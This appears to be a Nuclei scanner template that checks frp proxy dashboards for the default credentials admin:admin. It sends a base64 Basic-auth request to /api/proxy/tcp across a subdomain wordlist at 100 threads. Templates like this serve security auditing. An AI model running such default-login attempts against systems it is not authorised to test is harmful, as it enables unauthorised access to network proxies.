id: frp-default-login

info:
  name: Frp Default Login
  author: pikpikcu
  severity: high
  tags: frp,default-login
  reference: https://github.com/fatedier/frp/issues/1840

requests:
  - payloads:
      Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
    attack: sniper
    threads: 100

    raw:
      - |
        GET /api/proxy/tcp HTTP/1.1
        Host: {{Subdomains}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
        Accept: */*
        Authorization: "Basic YWRtaW46YWRtaW4="
    matchers-condition: and
    matchers:

      - type: word
        words:
          - "proxies"
        part: body
        condition: and

      - type: status
        status:
          - 200
